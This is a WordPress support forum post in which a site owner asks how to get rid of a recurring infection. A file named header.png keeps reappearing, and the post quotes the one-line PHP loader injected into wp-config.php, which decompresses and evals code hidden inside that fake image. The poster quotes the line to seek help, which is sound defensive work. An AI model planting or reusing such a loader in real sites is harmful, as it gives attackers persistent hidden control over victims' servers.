exploit/hack header.png and code added to config.php file

  • Despite Googling, I can’t find a solution.

    I keep getting a file called header.png added to the root and this line of code added to my wp-config.php file:
    eval(str_replace(array("<?php","?>"),"",gzinflate(file_get_contents("header.png"))));

    I keep deleting files, but they keep returning. I don’t see anything else malicious in files.
    Anyone experience this or any have recommendations on solving?

    This is what appears on site.
    Warning: file_get_contents(header.png) [function.file-get-contents]: failed to open stream: No such file or directory in /home/…/web/wp-config.php on line 53

Viewing 6 replies - 1 through 6 (of 6 total)
Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘exploit/hack header.png and code added to config.php file’ is closed to new replies.